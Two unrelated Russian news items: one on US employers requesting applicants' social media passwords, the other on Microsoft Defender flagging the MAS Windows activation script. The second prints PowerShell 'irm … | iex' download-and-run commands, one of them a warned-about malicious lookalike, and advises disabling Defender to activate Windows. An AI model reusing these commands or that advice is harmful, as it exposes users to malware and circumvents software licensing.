В США работодатели требуют от сотрудников пароли к соцсетям

В США работодатели требуют от сотрудников пароли к соцсетям

В США работодатели при приеме на работу требуют от будущих сотрудников компании личные пароли к соцсетям. Нечто подобное услышал нью-йоркский экономист Дастин Бассетт при приеме на работу. На интервью сотрудник отдела кадров открыла его страницу в Facebook и попросила пароль к его аккаунту. Мужчина отказался это сделать, сообщив, что не собирается работать на компанию, которая собирает личную информацию о сотрудниках.



Примечательно, что подобную практику часто применяют государственные службы, связанные с безопасностью и правопорядком. Например, подобные требования получают кандидаты на должности диспетчеров службы 911.

Однако не все соискатели могут позволить себе ответить отказом на подобные требования работодателя. Так, американец Роберт Коллинз, поступая на работу в одну из тюрем штата Флорида, был вынужден согласиться предоставить администрации свой пароль и логин на сайте Facebook. По словам администрации, данная информация была им необходима для проверки мужчины на возможные связи в криминальных кругах, сообщает rbc.ru.

В ответ юристы и представители Facebook предупредили работодателей о недопустимости требования к сотрудникам раскрыть пароль от доступа в социальную сеть. Считается, что социальная сеть позволяет судить о характере и склонностях будущих сотрудников.

Представитель Facebook накануне опубликовал заявление, в котором пригрозил юридическим разбирательством тем компаниям, которые запрашивают доступ к личным аккаунтам сотрудников. По словам Эрин Иган, главы подразделения Facebook по защите личных данных, компания в последние месяцы получает огромное количество писем с жалобами пользователей сети на запрос о предоставлении доступа к их страницам третьих лиц.

Законодатели сразу нескольких штатов, включая Калифорнию, Иллинойс и Мэриленд объявили о намерении провести законопроекты, в которых работодателям запрещается требовать пароли доступа к социальным сетям у соискателей вакансий.

Представители Facebook также указали на опасность для самих работодателей практики исследования социальных страниц кандидатов. По их словам, если кандидату на вакансию откажет работодатель, который изучил его социальную страницу, соискатель вакансии может подать на работодателя в суд за отказ по незаконным причинам (по причине возраста, сексуальной ориентации или расы).

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru